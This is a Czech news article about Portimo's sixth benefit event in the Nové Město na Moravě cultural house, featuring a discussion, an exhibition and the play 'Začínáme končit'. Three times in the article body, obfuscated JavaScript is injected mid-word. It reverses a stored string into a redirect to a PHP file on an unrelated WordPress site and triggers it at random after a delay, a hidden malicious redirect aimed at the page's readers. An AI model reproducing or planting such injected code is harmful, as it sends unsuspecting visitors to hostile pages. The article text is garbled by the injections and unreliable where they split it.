Rainbow page separator

Benefice se v novoměstském kulturním domě odehraje už pošesté

Úterý, 31. října 2017

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Už pošesté se mohou lidé zapojit do benefice, kterou pořádá novoměstská společnost Portimo. Akce s názvem Na jedné lodi, předsudkům navzdory se uskuteční v kulturním domě v pátek 3. lis[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}topadu. K tématu předsudků a stereotypů se vztahuje jak dopolední beseda, tak i celodenní výstava, výtvarný i fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografický ateliér a večerní divadlo. „Každý z nás určitými předsudky trpí a někdy se naopak stává jejich terčem, a tak se nám zdá důležité otevřeně o nich mluvit a přemýšlet,“ sdělila ředitelka společnosti Portimo Ruth Šormová.
Chybět nebude oblíbené hračkoviště pro malé i větší děti a benefiční kavárna s pestrou nabídkou kávy a dalších nápojů či sladkých i slaných dobrot a večer i s živou hudbou.
Vrcholem benefice bude od 19 hodin divadelní představení Začínáme končit, slavná hra o posledním létě proslulé herečky Sarah Bernhardt. Pro Divadlo Kalich se režie hry podle scénáře Johna Murrella ujala Alice Nellis, v hlavních rolích se představí Bára Hrzánová a Radek Holub. Vstupenky je možné zakoupit v předprodeji za 360 korun, případně přímo před představením za 390 korun.